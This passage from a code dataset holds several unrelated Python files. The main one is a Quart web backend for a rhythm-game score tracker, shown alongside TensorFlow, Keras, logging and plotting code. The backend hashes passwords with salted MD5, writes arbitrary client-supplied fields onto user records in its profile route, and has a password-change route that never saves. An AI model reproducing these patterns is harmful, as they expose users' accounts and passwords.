tf.layers.dense(Zeta,units=self.Nzeta,kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=1.))\r\n\r\n#\r\n self.A = tf.Variable(1/self.Nzeta/self.Nzeta * tf.random_normal(shape=(self.Nzeta,self.Nzeta),dtype=tf.float32),name='A')\r\n self.C = tf.get_variable(shape=(Ny,self.Nzeta),dtype=tf.float32,regularizer=tf.contrib.layers.l2_regularizer(scale=1.), name='C')\r\n err_y = tf.reduce_mean(tf.square(tf.matmul(Zeta,tf.transpose(self.C)) - self.Yn))\r\n tf.losses.add_loss(err_y)\r\n#\r\n def terminate_cond(itr,zz,err_zeta):\r\n return tf.less(itr,self.Nstep)\r\n def update(itr,zz,err_zeta):\r\n zz_hat = zz + tf.matmul(zz,tf.transpose(self.A))\r\n err_zeta = err_zeta + tf.reduce_mean(tf.square(zz_hat[:-(itr+1),:] - zz[itr+1:,:]))\r\n return (itr+1,zz_hat,err_zeta)\r\n\r\n (_,Zeta_hat,err_zeta) = tf.while_loop(terminate_cond, update, (0,Zeta,0.))\r\n tf.losses.add_loss(err_zeta/tf.cast(self.Nstep,tf.float32)/tf.reduce_mean(tf.square(Zeta)))\r\n\r\n self.Yn_hat = tf.matmul(Zeta_hat, tf.transpose(self.C))\r\n self.Yhat = self.Yn_hat * sd_y + mu_y\r\n\r\nclass trainer():\r\n def __init__(self,graph_skeleton,hyper_parameters):\r\n self.graph_skeleton = graph_skeleton\r\n self.hyper_parameters = hyper_parameters\r\n pass\r\n\r\n def pretrain(self,Xval,Yval,Zval):\r\n return ( np.mean(Xval,axis=0), np.std(Xval,axis=0), np.mean(Yval,axis=0), np.std(Yval,axis=0), np.mean(Zval,axis=0), 
np.std(Zval,axis=0),)\r\n\r\n def fit(self,Xval,Yval,Zval,Nhrzn,alpha=1e-2,Nitr=2**10,Nfreq_print=2**10,lmbd=1e-4,silent_mode=False):\r\n (Nt,Nx,Ny,Nz) = (Xval.shape[0],Xval.shape[1],Yval.shape[1],Zval.shape[1])\r\n mu_x,sd_x,mu_y,sd_y,mu_z,sd_z = self.pretrain(Xval,Yval,Zval)\r\n with tf.Graph().as_default():\r\n#\r\n itm_nxt = tf.data.Dataset.from_tensor_slices((Xval,Yval,Zval)).batch(Nt).repeat().make_one_shot_iterator().get_next()\r\n#\r\n X = tf.placeholder(shape=(None,Nx),dtype=tf.float32,name='X')\r\n Y = tf.placeholder(shape=(None,Ny),dtype=tf.float32,name='Y')\r\n Z = tf.placeholder(shape=(None,Nz),dtype=tf.float32,name='Z')\r\n Nstep = tf.placeholder(shape=(),dtype=tf.int32,name='Nstep')\r\n self.graph_skeleton(X,Y,Z,Nstep,mu_x,sd_x,mu_y,sd_y,mu_z,sd_z,**self.hyper_parameters)\r\n \r\n loss = tf.reduce_sum(tf.losses.get_losses()) + lmbd * tf.losses.get_regularization_loss()\r\n trainer = tf.train.AdamOptimizer(alpha).minimize(loss)\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n for itr in range(Nitr):\r\n (Xbatch,Ybatch,Zbatch) = sess.run(itm_nxt)\r\n feed_dict = {X: Xbatch, Y: Ybatch, Z: Zbatch, Nstep: Nhrzn}\r\n sess.run(trainer,feed_dict=feed_dict)\r\n\r\n if (itr % Nfreq_print == 0 or itr == (Nitr-1)) and not silent_mode:\r\n loss_val = sess.run(loss, feed_dict = feed_dict)\r\n print('itr: {0:4d}, loss_val: {1:.2e}'.format(itr,loss_val))\r\n\r\n\r\ndef gen_lorenz(Nt = 2**10, dt = 0.1):\r\n from scipy.integrate import ode\r\n\r\n# define Lorenz equation \r\n def f(t, x):\r\n rho = 28.\r\n sigma = 10.\r\n beta = 8./3.\r\n return [\r\n sigma * (x[1] - x[0]),\r\n x[0] * (rho - x[2]) - x[1],\r\n x[0] * x[1] - beta * x[2],\r\n ]\r\n# config parameter\r\n t0 = 0.\r\n x0 = np.ones(3)\r\n\r\n# setup ode-solver\r\n solver = ode(f).set_integrator('dopri5')\r\n solver.set_initial_value(x0,t0)\r\n# solve lorenz eq.\r\n X = np.array([solver.integrate(t0+t) for t in np.arange(Nt)*dt]) \r\n solver.set_initial_value(X[-1,:],t0)\r\n while True:\r\n X = np.array([solver.integrate(t0+t) for t in np.arange(Nt)*dt]) \r\n yield X\r\n t0 = t0 + Nt * dt\r\n","sub_path":"examples/work009.py","file_name":"work009.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"291752298","text":"import logging\nimport os\nimport datetime\n\n\nclass appLog:\n _logger = None\n\n def __new__(cls, *args, **kwargs):\n if cls._logger is None:\n\n logDir=None\n level=None\n if 'logDir' in kwargs.keys():\n logDir = kwargs['logDir']\n del kwargs['logDir']\n print('dirName passed is : ' + logDir)\n else:\n logDir=None\n \n if 'level' in kwargs.keys():\n level = kwargs['level']\n del kwargs['level']\n print('Level passed is : ' + level)\n else:\n level=None\n\n\n print(\"Logger new \")\n cls._logger = super().__new__(cls, *args, **kwargs)\n cls._logger = logging.getLogger(\"crumbs\")\n\n if level is None:\n cls._logger.setLevel(logging.ERROR) \n else:\n if level.upper() == 'INFO':\n cls._logger.setLevel(logging.INFO)\n elif level.upper() == 'DEBUG':\n cls._logger.setLevel(logging.DEBUG)\n elif level.upper() == 'WARNING':\n cls._logger.setLevel(logging.WARNING)\n elif level.upper() == 'ERROR':\n cls._logger.setLevel(logging.ERROR)\n else:\n cls._logger.setLevel(logging.ERROR)\n\n formatter = logging.Formatter(\n '%(asctime)s \\t [%(levelname)s | %(filename)s:%(lineno)s] > %(message)s')\n\n now = datetime.datetime.now()\n if logDir != None:\n if not os.path.isdir(logDir):\n 
os.mkdir(logDir)\n fileHandler = logging.FileHandler(\n logDir + \"/log_\" + now.strftime(\"%Y-%m-%d\")+\".log\")\n fileHandler.setFormatter(formatter)\n cls._logger.addHandler(fileHandler)\n\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n cls._logger.addHandler(streamHandler)\n\n return cls._logger\n\n\n# a simple usecase\nif __name__ == \"__main__\":\n logger = appLog()\n logger.info(\"Hello, Logger\")\n logger = appLog()\n logger.debug(\"bug occured\")","sub_path":"appLog/myPkg/myLog.py","file_name":"myLog.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"150446634","text":"from django.apps import AppConfig\nfrom tensorflow.keras.utils import CustomObjectScope\nfrom tensorflow.keras.initializers import glorot_uniform\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras import initializers, regularizers, constraints\nfrom tensorflow.keras.layers import Layer\nfrom django.urls import path\nimport os\n\nclass Attention(Layer):\n\tdef __init__(self, step_dim,\n\t\t\t\t W_regularizer=None, b_regularizer=None,\n\t\t\t\t W_constraint=None, b_constraint=None,\n\t\t\t\t bias=True, **kwargs):\n \n\t\tself.supports_masking = True\n\t\tself.init = initializers.get('glorot_uniform')\n\n\t\tself.W_regularizer = regularizers.get(W_regularizer)\n\t\tself.b_regularizer = regularizers.get(b_regularizer)\n\n\t\tself.W_constraint = constraints.get(W_constraint)\n\t\tself.b_constraint = constraints.get(b_constraint)\n\n\t\tself.bias = bias\n\t\tself.step_dim = step_dim\n\t\tself.features_dim = 0\n\t\tsuper(Attention, self).__init__(**kwargs)\n\n\tdef get_config(self):\n\t\tconfig = super().get_config().copy()\n\t\tconfig.update({\n\t\t\t\t#'supports_masking':self.supports_masking,\n\t\t\t\t#'init':self.init,\n\t\t\t\t'W_regularizer': self.W_regularizer,\n\t\t\t\t'b_regularizer': self.b_regularizer,\n\t\t\t\t'W_constraint': self.W_constraint,\n\t\t\t\t'b_constraint': self.b_constraint,\n\t\t\t\t'bias': self.bias,\n\t\t\t\t'step_dim':self.step_dim,\n\t\t\t\t#'features_dim':self.features_dim,\n\t\t})\n\t\treturn config\n\n\tdef build(self, input_shape):\n\t\tassert len(input_shape) == 3\n\n\t\tself.W = self.add_weight(shape=(input_shape[-1],),\n\t\t\t\t\t\t\t\t initializer=self.init,\n\t\t\t\t\t\t\t\t name='{}_W'.format(self.name),\n\t\t\t\t\t\t\t\t regularizer=self.W_regularizer,\n\t\t\t\t\t\t\t\t constraint=self.W_constraint)\n\t\tself.features_dim = input_shape[-1]\n\n\t\tif self.bias:\n\t\t\tself.b = self.add_weight(shape=(input_shape[1],),\n\t\t\t\t\t\t\t\t\t initializer='zero',\n\t\t\t\t\t\t\t\t\t name='{}_b'.format(self.name),\n\t\t\t\t\t\t\t\t\t regularizer=self.b_regularizer,\n\t\t\t\t\t\t\t\t\t constraint=self.b_constraint)\n\t\telse:\n\t\t\tself.b = None\n\n\t\tself.built = True\n\n\tdef compute_mask(self, input, input_mask=None):\n\t\treturn None\n\n\tdef call(self, x, mask=None):\n\n\t\tfeatures_dim = self.features_dim\n\t\tstep_dim = self.step_dim\n\n\t\teij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)), K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\n\n\t\tif self.bias:\n\t\t\teij += self.b\n\n\t\teij = K.tanh(eij)\n\t\ta = K.exp(eij)\n\t\ta /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n\n\t\ta = K.expand_dims(a)\n\t\tweighted_input = x * a\n\t\treturn K.sum(weighted_input, axis=1)\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn input_shape[0], 
self.features_dim\n\nclass NamegeneratorConfig(AppConfig):\n\n\tdef __init__(self, model_name):\n\n\t\tself.PRETRAINED_MODEL = \"ImageCaptioning/models/{}\".format(model_name)\n\t\t\n\tdef model(self):\n\t\twith CustomObjectScope({'GlorotUniform': glorot_uniform()}):\n\t\t\tmodel = load_model(self.PRETRAINED_MODEL, \n\t\t\t\tcustom_objects={'Attention':Attention})\n\n\t\treturn model","sub_path":"image_captioning_app/ImageCaptioning/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"272824151","text":"from collections import defaultdict\nfrom functools import cmp_to_key, wraps\nfrom typing import Optional, Dict\n\nimport time\nfrom quart import *\nfrom _jwt import *\nimport asyncio\nfrom models import *\nimport json\nimport hashlib\nimport random\nimport string\nimport math\n\n\ndef md5(v: str):\n return hashlib.md5(v.encode(encoding='UTF-8')).hexdigest()\n\n\ncs_need_update = True\ncs_cache = {}\nmd_cache = music_data()\nmd_map = {}\nfor music in md_cache:\n md_map[music['id']] = music\n\n\ndef get_ds(r: Dict):\n for m in md_cache:\n if m['title'] == r[\"title\"] and m['type'] == r['type']:\n return m[\"ds\"][r[\"level_index\"]]\n return 0\n\n\ndef is_new(r: Dict):\n for m in md_cache:\n if m['title'] == r[\"title\"] and m['type'] == r['type']:\n return m[\"basic_info\"][\"is_new\"]\n return False\n\n\ndef is_new_2(r: Record):\n for m in md_cache:\n if m['title'] == r.title and m['type'] == r.type:\n return m[\"basic_info\"][\"is_new\"]\n return False\n\n\napp = Quart(__name__)\n\nwith open('config.json', encoding='utf-8') as fr:\n config = json.load(fr)\n db_url = config[\"database_url\"]\n jwt_secret = config[\"jwt_secret\"]\n\n\n@app.after_request\ndef cors(environ):\n environ.headers['Access-Control-Allow-Origin'] = '*'\n environ.headers['Access-Control-Allow-Method'] = '*'\n environ.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n return environ\n\n\n@app.route(\"/feedback\", methods=['POST'])\nasync def feedback():\n j = await request.get_json()\n FeedBack.insert(j).execute()\n return {\"message\": \"提交成功\"}\n\n\ndef login_required(f):\n @wraps(f)\n async def func(*args, **kwargs):\n try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"尚未登录\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"尚未登录\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n g.username = token['username']\n g.user = Player.get(Player.username == g.username)\n return await f(*args, **kwargs)\n\n return func\n\n\n@app.route(\"/login\", methods=['POST'])\nasync def login():\n j = await request.get_json()\n username = j[\"username\"]\n password = j[\"password\"]\n try:\n user: Player = Player.get(Player.username == username)\n if md5(password + user.salt) == user.password:\n resp = await make_response({\"message\": \"登录成功\"})\n resp.set_cookie('jwt_token', username_encode(\n username), max_age=30 * 86400)\n return resp\n except Exception:\n pass\n return {\n \"errcode\": -3,\n \"message\": \"用户名或密码错误\",\n }, 401\n\n\n@app.route(\"/register\", methods=['POST'])\nasync def register():\n j = await request.get_json()\n player = Player.select().where(Player.username == j[\"username\"])\n if player.exists():\n return {\n \"errcode\": -1,\n \"message\": \"此用户名已存在\",\n }, 400\n salt = ''.join(random.sample(string.ascii_letters + string.digits, 16))\n 
Player.create(username=j[\"username\"], salt=salt,\n password=md5(j[\"password\"] + salt))\n resp = await make_response({\"message\": \"注册成功\"})\n resp.set_cookie('jwt_token', username_encode(j[\"username\"]))\n return resp\n\n\n@app.route(\"/player/profile\", methods=['GET', 'POST'])\n@login_required\nasync def profile():\n if request.method == 'GET':\n u: Player = g.user\n return {\n \"username\": u.username,\n \"nickname\": u.nickname,\n \"additional_rating\": u.additional_rating,\n \"bind_qq\": u.bind_qq,\n \"privacy\": u.privacy,\n \"plate\": u.plate\n }\n else:\n try:\n obj = await request.json\n # handle plate there.\n if \"plate\" in obj:\n d = obj[\"plate\"]\n version = d[\"version\"]\n plate_type = d[\"plate_type\"]\n verified, plate_label = verify_plate(g.user, version, plate_type)\n if verified:\n g.user.__setattr__(\"plate\", plate_label)\n del obj[\"plate\"]\n for key in obj:\n g.user.__setattr__(key, obj[key])\n g.user.save()\n u: Player = g.user\n return {\n \"username\": u.username,\n \"nickname\": u.nickname,\n \"additional_rating\": u.additional_rating,\n \"bind_qq\": u.bind_qq,\n \"privacy\": u.privacy,\n \"plate\": u.plate\n }\n except Exception:\n return {\n \"message\": \"error\"\n }, 400\n\n\ndef verify_plate(player, version, plate_type) -> Tuple[bool, str]:\n try:\n if version == \"无\":\n return True, \"\"\n plate_name = get_plate_name(version, plate_type)\n if plate_name == \"真将\":\n return False, \"\"\n return True, plate_name\n except Exception:\n return False, \"\"\n\n\n@app.route(\"/player/change_password\", methods=['POST'])\n@login_required\nasync def change_password():\n password = (await request.json)[\"password\"]\n if len(password) >= 30:\n return {\"message\": \"密码不能大于30位\"}, 400\n g.user.password = md5(password + g.user.salt)\n return {\"message\": \"success\"}\n\n\n@app.route(\"/music_data\", methods=['GET'])\nasync def get_music_data():\n resp = await make_response(json.dumps(md_cache))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/player/records\", methods=['GET'])\n@login_required\nasync def get_records():\n r = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', g.user.id)\n await compute_ra(g.user)\n records = []\n for record in r:\n elem = record_json(record)\n records.append(elem)\n return {\"records\": records, \"username\": g.username, \"additional_rating\": g.user.additional_rating}\n\n\n@app.route(\"/player/test_data\", methods=['GET'])\nasync def get_test_data():\n r = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', 293)\n records = []\n for record in r:\n elem = record_json(record)\n records.append(elem)\n return {\"records\": records, \"username\": \"TESTUSER\", \"additional_rating\": \"2100\"}\n\n\ndef get_dx_and_sd(player):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type 
as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n l1 = []\n l2 = []\n for r in l:\n setattr(r, 'ra', r.ds * get_l(r.achievements)\n * min(100.5, r.achievements) / 100)\n if r.is_new:\n l2.append(r)\n else:\n l1.append(r)\n l1.sort(key=lambda x: x.ra, reverse=True)\n l2.sort(key=lambda x: x.ra, reverse=True)\n return l1[:25], l2[:15]\n\n\ndef get_dx_and_sd_for50(player):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n l1 = []\n l2 = []\n for r in l:\n setattr(r, 'ra', r.ds * get_l(r.achievements)\n * min(100.5, r.achievements) / 100)\n if r.is_new:\n l2.append(r)\n else:\n l1.append(r)\n l1.sort(key=lambda x: x.ra, reverse=True)\n l2.sort(key=lambda x: x.ra, reverse=True)\n return l1[:35], l2[:15]\n\n\ndef getplatelist(player, version: List[Dict]):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs,chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.version as `version`, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n fl = recordList()\n vl = []\n for r in l:\n fl.append(r)\n for i in range(0, len(version)):\n vl += fl.filter(version=version[i])\n return vl\n\n\n@app.route(\"/query/player\", methods=['POST'])\nasync def query_player():\n obj = await request.json\n try:\n if \"qq\" in obj:\n p: Player = Player.get(Player.bind_qq == obj[\"qq\"])\n else:\n username = obj[\"username\"]\n p: Player = Player.get(Player.username == username)\n except Exception:\n return {\n \"message\": \"user not exists\"\n }, 400\n if p.privacy and \"username\" in obj:\n try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n if token['username'] != obj[\"username\"]:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if \"b50\" in obj:\n sd, dx = get_dx_and_sd_for50(p)\n else:\n sd, dx = get_dx_and_sd(p)\n asyncio.create_task(compute_ra(p))\n nickname = p.nickname\n if nickname == \"\":\n nickname = p.username if len(p.username) <= 8 else p.username[:8] + '…'\n try:\n user_data = json.loads(p.user_data)\n except Exception:\n user_data = None\n return {\n \"username\": p.username,\n \"rating\": p.rating,\n \"additional_rating\": p.additional_rating,\n \"nickname\": nickname,\n \"plate\": p.plate,\n \"charts\": {\n \"sd\": [record_json(c) for c in sd],\n \"dx\": [record_json(c) for c in dx]\n },\n \"user_id\": p.user_id,\n \"user_data\": user_data\n }\n\n\n@app.route(\"/query/plate\", methods=['POST'])\nasync def query_plate():\n obj = await request.json\n try:\n if \"qq\" in obj:\n p: Player = Player.get(Player.bind_qq == obj[\"qq\"])\n else:\n username = obj[\"username\"]\n p: Player = Player.get(Player.username == username)\n except Exception:\n return {\"message\": \"user not exists\"}, 400\n if p.privacy and \"username\" in obj:\n 
try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n if token['username'] != obj[\"username\"]:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n v: List[Dict] = obj[\"version\"]\n vl = getplatelist(p, v)\n return {\n \"verlist\": [platerecord_json(c) for c in vl]\n }\n\n\nasync def compute_ra(player: Player):\n rating = 0\n sd, dx = get_dx_and_sd(player)\n for t in sd:\n rating += int(t.ra)\n for t in dx:\n rating += int(t.ra)\n player.rating = rating\n player.save()\n return rating\n\n\n@app.route(\"/player/update_records\", methods=['POST'])\n@login_required\nasync def update_records():\n global cs_need_update\n cs_need_update = True\n j = await request.get_json()\n dicts = {}\n if \"userId\" in j:\n try:\n for ml in j[\"userMusicList\"]:\n for m in ml[\"userMusicDetailList\"]:\n if str(m[\"musicId\"]) not in md_map:\n continue\n music = md_map[str(m[\"musicId\"])]\n level = m[\"level\"]\n achievement = m[\"achievement\"]\n fc = [\"\", \"fc\", \"fcp\", \"ap\", \"app\"][m[\"comboStatus\"]]\n fs = [\"\", \"fs\", \"fsp\", \"fsd\", \"fsdp\"][m[\"syncStatus\"]]\n dxScore = m[\"deluxscoreMax\"]\n cid = music[\"cids\"][level]\n dicts[cid] = (achievement / 10000.0, fc, fs, dxScore)\n g.user.user_id = j[\"userId\"]\n g.user.user_data = json.dumps(j[\"userData\"]) if \"userData\" in j else \"\"\n g.user.save()\n except Exception as e:\n return {\n \"message\": str(e)\n }, 400\n else:\n for record in j:\n # print(time.time())\n title = record['title']\n _type = record['type']\n level = record['level_index']\n m = get_music_by_title(md_cache, title, _type)\n if m is None or level >= len(m[\"cids\"]):\n continue\n cid = m[\"cids\"][level]\n dicts[cid] = (record[\"achievements\"], record[\"fc\"],\n record[\"fs\"], record[\"dxScore\"])\n rs = NewRecord.raw(\n 'select * from newrecord where player_id = %s', g.user.id)\n updates = []\n creates = []\n for r in rs:\n # print(r.chart_id)\n if r.chart_id in dicts:\n v = dicts[r.chart_id]\n r.achievements = v[0]\n r.fc = v[1]\n r.fs = v[2]\n r.dxScore = v[3]\n updates.append(r)\n del dicts[r.chart_id]\n # print(len(dicts))\n for k in dicts:\n v = dicts[k]\n creates.append({\"chart\": k, \"player\": g.user.id,\n \"fc\": v[1], \"fs\": v[2], \"dxScore\": v[3], \"achievements\": v[0]})\n NewRecord.insert_many(creates).execute()\n # print(updates)\n NewRecord.bulk_update(updates, fields=[\n NewRecord.achievements, NewRecord.fc, NewRecord.fs, NewRecord.dxScore])\n await compute_ra(g.user)\n return {\n \"message\": \"更新成功\",\n }\n\n\n@app.route(\"/player/update_record\", methods=['POST'])\n@login_required\nasync def update_record():\n # must be update.\n global cs_need_update\n cs_need_update = True\n record = await request.get_json()\n title = record['title']\n _type = record['type']\n level = record['level_index']\n m = get_music_by_title(md_cache, title, _type)\n if m is None:\n return\n cid = m[\"cids\"][level]\n r: NewRecord = NewRecord.get(\n (NewRecord.player == g.user.id) & (NewRecord.chart == cid))\n assert r\n r.achievements = record['achievements']\n r.fc = record['fc']\n r.fs = record['fs']\n r.save()\n await compute_ra(g.user)\n return {\n \"message\": \"更新成功\",\n }\n\n\n@app.route(\"/player/delete_records\", methods=['DELETE'])\n@login_required\nasync def delete_records():\n global cs_need_update\n 
cs_need_update = True\n nums = NewRecord.delete().where(NewRecord.player == g.user.id).execute()\n await compute_ra(g.user)\n return {\n \"message\": nums\n }\n\n\n@app.route(\"/rating_ranking\", methods=['GET'])\nasync def rating_ranking():\n players = Player.select()\n data = []\n for player in players:\n data.append({\"username\": player.username, \"ra\": player.rating})\n resp = await make_response(json.dumps(data, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/count_view\", methods=['GET'])\nasync def count_view():\n v: Views = Views.get()\n v.prober += 1\n v.save()\n return {\"views\": v.prober}\n\n\nasync def message_resp():\n today_ts = int((time.time() + 8 * 3600) / 86400) * 86400 - 8 * 3600\n results = Message.select(Message, Player).join(\n Player).where(Message.ts >= today_ts)\n l = []\n for r in results:\n l.append({\"text\": r.text, \"username\": r.player.username,\n \"ts\": r.ts, \"nickname\": r.nickname})\n resp = await make_response(json.dumps(l, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/message\", methods=['GET'])\nasync def message_g():\n return await message_resp()\n\n\n@app.route(\"/message\", methods=['POST'])\n@login_required\nasync def message():\n if request.method == 'POST':\n a = Message()\n a.player = g.user\n j = await request.get_json()\n a.text = j[\"text\"]\n a.nickname = j[\"nickname\"]\n a.ts = int(time.time())\n a.save(force_insert=True)\n return await message_resp()\n\n\n@app.route(\"/chart_stats\", methods=['GET'])\nasync def chart_stats():\n global cs_need_update\n global cs_cache\n if len(cs_cache) > 0:\n resp = await make_response(json.dumps(cs_cache, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n cursor = NewRecord.raw(\n 'select newrecord.chart_id, count(*) as cnt, avg(achievements) as `avg`,'\n ' sum(case when achievements >= 100 then 1 else 0 end) as sssp_count from newrecord group by chart_id'\n )\n data = defaultdict(lambda: [{}, {}, {}, {}, {}])\n for elem in cursor:\n data[elem.chart.music.id][elem.chart.level] = {\"count\": elem.cnt,\n \"avg\": elem.avg,\n \"sssp_count\": int(elem.sssp_count)\n }\n level_dict = defaultdict(lambda: [])\n md = md_cache\n for elem in md:\n key = elem['id']\n for i in range(len(elem['ds'])):\n elem2 = {\n \"key\": key,\n \"level_index\": i,\n \"count\": 1,\n \"avg\": 0,\n \"sssp_count\": 0\n }\n for _k in data[key][i]:\n elem2[_k] = data[key][i][_k]\n if elem2['count'] >= 30:\n level_dict[elem['level'][i]].append(elem2)\n for level in level_dict:\n level_dict[level].sort(\n key=lambda x: x['sssp_count'] / x['count'], reverse=True)\n ln = len(level_dict[level])\n for i in range(ln):\n elem = level_dict[level][i]\n rate = ((i + 0.5) / ln)\n if elem['count'] < 30:\n continue\n if rate <= 0.1:\n elem['tag'] = 'Very Easy'\n elif rate <= 0.3:\n elem['tag'] = 'Easy'\n elif rate < 0.7:\n elem['tag'] = 'Medium'\n elif rate < 0.9:\n elem['tag'] = 'Hard'\n else:\n elem['tag'] = 'Very Hard'\n elem['v'] = i\n elem['t'] = ln\n level_index = elem['level_index']\n key = elem['key']\n del elem['key']\n del elem['level_index']\n data[key][level_index] = elem\n cs_cache = data\n cs_need_update = False\n resp = await make_response(json.dumps(data, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\napp.run(host='0.0.0.0', port=8333, 
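# --- Illustrative aside (not part of the original file) ---
# chart_stats above ranks each chart within its level by SSS+ rate
# (sssp_count / count) and tags it by percentile position. A compact,
# self-contained version of that bucketing:
def tag_by_percentile(charts):
    # charts: dicts with 'count' and 'sssp_count'; the route sorts easiest
    # (highest SSS+ rate) first, then tags by rank percentile.
    ranked = sorted(charts, key=lambda c: c['sssp_count'] / c['count'], reverse=True)
    n = len(ranked)
    for i, c in enumerate(ranked):
        rate = (i + 0.5) / n
        if rate <= 0.1:
            c['tag'] = 'Very Easy'
        elif rate <= 0.3:
            c['tag'] = 'Easy'
        elif rate < 0.7:
            c['tag'] = 'Medium'
        elif rate < 0.9:
            c['tag'] = 'Hard'
        else:
            c['tag'] = 'Very Hard'
    return ranked

tag_by_percentile([{'count': 40, 'sssp_count': 8}, {'count': 50, 'sssp_count': 2}])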
loop=asyncio.get_event_loop())\n","sub_path":"database/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"323574520","text":"#!/usr/bin/env python\r\n#-*- coding: latin-1 -*-\r\n\r\n\"\"\"\r\nMake lineplot from data in sql query\r\n\"\"\"\r\n\r\nfrom get_TicketData import Get_TicketData as td\r\nfrom datetime import date as dat\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\n\r\n\r\n__author__ = \"Ralf kelzenberg\"\r\n__copyright__ = \"Copyright 2011, Ralf Kelzenberg\"\r\n__credits__ = [\"Ralf Kelzenberg\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"3\"\r\n__maintainer__ = \"Ralf Kelzenberg\"\r\n__email__ = \"mail@ralfkelzenberg.de\"\r\n__status__ = \"Alpha\"\r\n\r\n\r\ndef show_lineplot(results, save=None, show=True):\r\n \"\"\"\r\n Show a plot of data given in input sql statement\r\n\r\n sql:\r\n string that contains a sql returning data in the format [category, date, value]\r\n \"\"\"\r\n n = 1\r\n cmap = cm.get_cmap()\r\n if(save):\r\n pp = PdfPages(save)\r\n\r\n for result in results:\r\n figure = plt.figure(n)\r\n #plt.subplot(len(results), 1, n)\r\n plt.title(\"Plot\" + str(n))\r\n\r\n lab = []\r\n for row in result:\r\n s = \"\"\r\n l = []\r\n for i in range(len(row)):\r\n if(i < len(row) - 2):\r\n s += str(row[i]).strip()\r\n if i < len(row) - 3:\r\n s += \", \"\r\n else:\r\n l.append(row[i])\r\n l.insert(0, s)\r\n lab.append(l)\r\n\r\n labels = list(set([x[0] for x in lab]))\r\n for i in range(len(labels)):\r\n plt.plot_date([x[-2] for x in lab if x[0] == labels[i]],\r\n [x[-1] for x in lab if x[0] == labels[i]],\r\n label=str(labels[i]), marker=None, linestyle=\"-\", color=cmap(float(i) / (len(labels) - 1)))\r\n plt.legend(loc=2)\r\n\r\n plt.xlabel('Zeit')\r\n if(lab[-1][-1] < 1):\r\n plt.ylabel('Quote')\r\n else:\r\n plt.ylabel('Anzahl')\r\n\r\n figure.autofmt_xdate()\r\n if(save):\r\n pp.savefig(figure)\r\n n += 1\r\n if(save):\r\n pp.close()\r\n if(show):\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n data = []\r\n data.append(td().get_Info(katList=[\"st1\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, 